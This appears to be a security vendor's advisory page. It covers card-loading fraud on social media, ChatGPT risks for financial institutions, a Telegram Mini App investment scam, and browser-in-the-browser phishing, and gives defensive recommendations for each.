Card Loading Schemes on Social Media
What’s on this page
We have recently observed various groups on social media platforms where individuals are engaging in the act of “Credit or Debit card loading”, “Bank loading” or “Gift-card loading” etc.
These practices involve inviting individuals to deposit/receive funds through different payment service providers and banking channels. In exchange for their deposits, participants are promised attractive returns or opportunities.
Various individuals were also observed on social media sharing and inquiring about card loading based on BIN numbers referring to loading funds on cards or digital cards based on specific BIN numbers. An example of such posts can be seen in the screenshots below. Since specific BIN ranges are allocated for prepaid or digital cards, these BIN ranges are targeted for loading purposes.
"Loaders" and "Receivers" are terms used to describe the roles of individuals involved in a particular type of scheme. These roles are often associated with money laundering and illegal transfer of funds. Here's what each term means:
Loader: A loader is an individual or group responsible for loading funds onto cards or other payment instruments using various means, including stolen credit card information, compromised bank accounts, or illicitly obtained funds. They may use techniques like credit card bust-out scams or unauthorized transfers to load money onto cards.
Receiver: A receiver is an individual or group who receives the loaded funds, typically through cards, and is responsible for converting or transferring the funds to the fraudsters or the next stage in the money laundering process. The receiver may receive loaded cards, withdraw cash from ATMs, or use the cards to launder the money for purchases.
Risks involved in such Loading / Receiving schemes:
Once the target BINs are identified, funds are transferred or loaded onto the cards or accounts associated with those BINs. Depending on the card's capabilities, the cards or accounts with loaded funds can then be used for various purposes, such as making purchases, online transactions, or ATM withdrawals. Such practices can potentially be abused for fraudulent purposes leading to the following:
Credit Card Bust-Out Scams: In a bust-out scam, fraudsters obtain credit cards using stolen identities or fake information. They load these cards with funds, either through illicit means or by taking advantage of introductory offers with low or zero interest rates. Once the cards are loaded, they quickly max out the credit limit and disappear without making any payments. This leaves the legitimate cardholder or the card issuer responsible for the debt.
Money Laundering: Criminals may use credit card loading to launder money obtained through illegal activities. They load illicitly gained funds onto cards and then use those cards for legitimate purchases or withdrawals, making it difficult for law enforcement to trace the origin of the money.
Money Mule Accounts: Illegally obtained card details or hacked accounts may be exploited to transfer funds to a mule account controlled by fraudsters swiftly. Subsequently, the funds are instantaneously dispersed to various colluding recipients, who, in turn, forward the money or convert it to cash, thereby complicating the money trail and evading detection by anti-money laundering (AML) systems.
Various loading/receiving schemes that we have observed are as follows:
- Bank account Loading
- Credit or Debit Card Loading
- Crypto Loading
- Gift card or prepaid card Loading
- Paypal / Sendwave Loading
It's important to note that credit/debit card loading itself is not inherently fraudulent. Many legitimate uses exist, such as loading funds onto cards for personal budgeting or gifting purposes. However, it is crucial for individuals and financial institutions to be vigilant about potential abuse and to implement security measures to prevent fraudulent activities.
Recommendations:
To protect financial institutions and customers from fraudulent activities involving loaders and receivers, here are some recommendations they can implement:
- Raise awareness by issuing notices on official channels to the customers to avoid such card-loading practices.
- Educate customers about the risks of loading/receiving funds from unknown sources or through suspicious methods. Encourage them to report any unauthorized or suspicious transactions promptly.
- Strengthen identity verification processes when opening new accounts, issuing prepaid cards, or processing transactions. This includes using multi-factor authentication and conducting thorough background checks on customers to detect potential fraudulent actors.
Recent Blogs
Navigating The Risks Of ChatGPT On Financial Institutions
What is ChatGPT?
ChatGPT, an advanced AI language model created by OpenAI, is gaining popularity and attention for its ability to generate human-like responses to natural language input. Trained on large amounts of data, ChatGPT's context comprehension and relevant response generation have made it a popular choice for businesses seeking to enhance customer experience and operations.
Major technology corporations are making significant investments in Artificial Intelligence (AI). Microsoft, for instance, has declared that it will invest $10 billion in OpenAI and intends to merge ChatGPT into its Azure OpenAI suite. This will allow businesses to include AI assets, including DALL-E, a program that generates images, and Codex, which transforms natural language into code, in their technology infrastructure.
While ChatGPT has several benefits for financial institutions, such as improving customer service and automating certain tasks, it also carries some risks that need to be addressed. Major banks and other institutions in the US have banned the use of ChatGPT within the organization. Concerns over sensitive information being put into the chatbot.
Risks associated with incorporating ChatGPT
Let's delve into the potential risks that are currently being debated regarding the use of ChatGPT:
- Data Exposure: One potential risk of using ChatGPT in the workplace is the inadvertent exposure of sensitive data. For example, employees using ChatGPT to generate data insights and analyze large amounts of financial data could unknowingly reveal confidential information while conversing with the AI model, which could lead to breaches of privacy or security. Another known data exposure case observed is Employees could potentially expose private code if they inadvertently include confidential information in the training data. This could occur if an employee includes code snippets that contain sensitive data or proprietary information, such as API keys or login credentials.
- Misinformation: ChatGPT can generate inaccurate or biased responses based on its programming and training data. Financial professionals should be cautious while using it to avoid spreading misinformation or relying on unreliable advice. ChatGPT’s current version was only trained on data sets available through 2021. In addition, the tool pulls online data that isn’t always accurate.
- Technology Dependency: While ChatGPT offers useful insights for financial decision-making, relying solely on technology may overlook human judgment and intuition. Financial professionals may misunderstand ChatGPT's recommendations or become over-reliant on it. Thus, maintaining a balance between technology and human expertise is crucial.
- Privacy Concerns: ChatGPT gathers a lot of personal data that users, unassumingly, might provide. Most AI models need a lot of data to be trained and improved, similarly, organizations might have to process a massive amount of data to train ChatGPT. This can pose a significant risk to individuals and organizations if the information is exposed or used maliciously.
External Risks associated with ChatGPT
- Social Engineering: Cybercriminals can use ChatGPT to impersonate individuals or organizations and create highly personalized and convincing phishing emails, making it difficult for victims to detect the attack. This can lead to successful phishing attacks and increase the likelihood of individuals falling for the scam.
- Creating malicious scripts and malware: Cybercriminals can train ChatGPT on vast amounts of code to produce undetectable malware strains that can bypass traditional security defenses. By using polymorphic techniques like encryption and obfuscation, this malware can dynamically alter its code and behavior, making it challenging to analyze and identify.
Recommendations:
- Financial institutions should establish clear policies and guidelines for using ChatGPT in the workplace to safeguard confidential information and mitigate the risks of data exposure.
- Anonymized data should be used to train an AI model to protect the privacy of individuals and organizations whose data is being used.
- Specific controls should be applied to how employees use information from ChatGPT in connection with their work.
- Awareness training should be provided to Employees who have access to ChatGPT on the potential risks associated with the use of the technology, including the risks of data exposure, privacy violations, and ethical concerns.
- Restricting access to ChatGPT will limit the potential for data exposure and misuse of the technology.
TRAP10 Mini App Scam
Overview:
CTM360 has discovered a new variation of scam tactics using Telegram Mini Apps and social media ads in a Ponzi-style scheme. Scammers impersonate financial institutions, leveraging Meta Ads, Telegram Ads, and fake social media accounts to lure victims into fraudulent investment platforms.
These platforms, embedded within Telegram, present a polished interface that mimics legitimate trading sites. Victims are enticed with promises of high returns, referral bonuses, and exclusive investment opportunities. Once inside, they are encouraged to deposit cryptocurrency, believing they are engaging in real trading. However, withdrawals are consistently blocked when users attempt to cash out.
CTM360 Observations
Resource Development
Telegram Mini App
- A Mini App in Telegram is a lightweight web application that runs within the Telegram interface, allowing users to interact with services like payments, games, or trading platforms without leaving the app.
- Scammers embed these fake websites inside Telegram Mini Apps, making them accessible within Telegram itself.
- Users interact with the fake platform through Telegram bots keeping them within the scam ecosystem.
Scammers also create fake websites with dedicated domains that mimic real platforms, solely for fraudulent trading, deposits, and referral scams.
Trigger
Scammers lure victims with false promises of high, risk-free returns, financial incentives like bonuses and referral rewards, and fake branding to appear credible. They create urgency with limited-time offers and countdowns to pressure quick investments.
Distribution
Scammers spread the fraud across multiple platforms:
- Meta & Telegram Ads – Paid ads and channels drive users to fake trading platforms.
- Telegram Bots & Channels – Used to lure victims into scam sites and mini-apps.
- Social Media & Messaging Apps – Victims unknowingly spread the scam by inviting friends for bonuses.
By using ads, fake profiles, and victim referrals, scammers rapidly expand their reach.
Target Interaction
Impersonated and Bogus Profiles
- Fake social media accounts are created to promote, manage and provide fake customer service to the victims
- We have also noticed scammers impersonating financial institutions, investment platforms and other industry organizations on Telegram to lure victims.
Impersonated or Bogus Websites embedded within Telegram Mini App
- The scam operates within a Telegram Mini App, where victims are redirected to the fake investment website.
- The Mini App will retrieve victim’s Telegram details and allow them quick access on these fake websites without sign-up.
- Upon sign-up, victims are requested to deposit funds and trade but withdrawals are blocked.
Motive
- PII Harvesting – Scammers collects your email address, phone number, Telegram IDs during the sign up process.
Monetization
- Payments to Cryptocurrency Wallets – Victims are tricked into transferring funds via cryptocurrency (e.g., USDT, BNB, TRX) to scam-controlled wallets.
- Selling Data on the Dark Web – The stolen credentials, Telegram IDs, emails, and phone numbers can likely be sold on underground forums or leveraged for future cyber criminal activities
Recommendations
For Individuals:
- Avoid Telegram Mini Apps for Trading – Scammers use them to bypass security measures.
- Verify Websites & Domains – Always check official sources before engaging in financial transactions.
- Use 2FA on All Accounts – Protect Telegram and crypto wallets from unauthorized access.
- Never transfer funds to an account without verifying the purpose and recipient independently.
For Businesses:
- Scan social media, Telegram, and ad networks for scams related to your brand and report them accordingly.
- Work with platforms to remove and takedown fraudulent sites.
- Educate and warn users on common fraud schemes.
Disclaimer
The information contained in this document is meant to provide general guidance and brief information to the intended recipient pertaining to the incident and recommended action. Therefore, this information is provided "as is" without warranties of any kind, express or implied, including accuracy, timeliness, and completeness. Consequently, under NO condition shall CTM360®, its related partners, directors, principals, agents, or employees be liable for any direct, indirect, accidental, special, exemplary, punitive, consequential, or other damages or claims whatsoever including, but not limited to: loss of data, loss in profits/business, network disruption…etc., arising out of or in connection with this advisory.
For more information:
Email: monitor@ctm360.com Tel: (+973) 77 360 360
A browser-in-the-browser (BitB) attack - Cyber Advisory
A Browser-in-the-Browser (BitB) attack is a sophisticated cyber threat involving injecting malicious code into a victim's web browser.
Threat Overview:
This code creates a secondary browser within the victim's existing browser, allowing the attacker to manipulate web content, intercept network requests, and potentially gain control over the victim's browser and system. Understanding the BitB attack is crucial for organizations to develop effective mitigation strategies.
Once the website is opened, it appears as shown above (this will be the first step).
After enforcing the Full-screen display mode, only the inner browser will appear with the customized URL by the attacker.
Real-Case Scenarios of BitB Attacks:
CTM360 recently observed ongoing attack campaigns utilizing the BitB technique targeting ministries and government websites, specifically the interior ministries.
In the previously mentioned scenario, the official website of MOI Singapore remains unaffected and secure. However, the threat actor is carrying out a phishing attack by creating a fake website. Within this fraudulent site, instead of using traditional phishing methods, such as fake forms or malicious content, the attacker employs a fake browser interface within the phishing site, which appears to be the genuine site for MOI. When the victim accesses the site, they are presented with a full-screen display mode of this embedded browser, which tricks them into submitting their sensitive information.
Attack Methodology
To execute a Browser-in-the-Browser (BitB) attack, the attacker employs tactics to lure the user into visiting a malicious or compromised website. This website contains a phishing page hosted on the attacker's server. The phishing page utilizes JavaScript code to create a simulated browser window, simulating the appearance and behavior of a legitimate browser window. Within this simulated window, various types of fraudulent activities can be displayed.
Moreover, the simulated window displays a URL of the attacker's choice, such as https://accounts.google.com or https://login.microsoftonline.com. This is achieved by modifying the simulated address bar of the pop-up window using JavaScript. It may appear to the user that the specified URL is loaded within the pop-up window, but in reality, it is only shown as an image or text. The user may not notice the absence of SSL certificates or other security indicators typically present in a genuine browser window due to the full-screen display mode, which blocks the appearance of the main website’s URL due to the full-screen display model.
If the user falls victim to the BitB attack and enters their login credentials into the fake login form, the information is sent to the attacker's server via an AJAX request or a concealed form submission. Subsequently, the attacker gains access to the user's account on the legitimate service or proceeds with additional malicious activities such as identity theft or account takeover.
Potential Threats
Browser-in-the-Browser (BitB) attacks pose several potential threats and risks to victims. Here are some of the common threats associated with BitB attacks:
- Data Theft: Attackers can exploit BitB attacks to steal sensitive information, such as login credentials, financial details, personal data, or intellectual property. This stolen data can be used for identity theft, financial fraud, or sold on the dark web.
- Account Takeover: By manipulating the victim's browser and intercepting login credentials, BitB attacks can lead to unauthorized access to the victim's online accounts. Attackers may gain control over email accounts, social media profiles, online banking, or other services, enabling them to impersonate the victim or perform malicious activities.
- Malware Distribution: BitB attacks can be used as a vector to distribute malware onto the victim's system. The secondary browser created by the attacker can be used to download and execute malicious software, potentially leading to further compromise of the victim's device and sensitive data.
- Phishing and Social Engineering: Attackers can utilize BitB attacks to create convincing phishing scenarios. By simulating legitimate websites or services, they trick users into entering their login credentials or other sensitive information, which the attacker then captures and exploits.
Mitigation
The BitB attack is a tricky and risky phishing technique that can trick even careful users and bypass typical security measures. However, there are steps you can take to protect yourself from this attack:
- Be cautious of full-screen prompts: Exercise caution if a website unexpectedly opens a full-screen prompt or overlay. Take a moment to assess the situation and ensure that you are interacting with a legitimate website before entering any sensitive information.
- Be vigilant about website URLs: Pay close attention to the URL before entering any sensitive information. Check for any discrepancies or variations in the domain name or spelling that may indicate a phishing site.
- Pay attention to the details of the pop-up window, such as the size, position, appearance, and behavior of the elements. If something looks off or unusual, you should close the window and report it.
- Use a security-focused browser extension that can detect and block such phishing attempts automatically.
- Keep your browser up to date with the latest security patches and update whenever prompted by your browser.
- Make sure you have 2FA enabled for all of your critical services.
CTM360 is actively monitoring this phishing campaign and taking the necessary action by disrupting the attack and suspending the malicious site/domain. If you encounter any of such malicious sites, please report it to business@ctm360.com.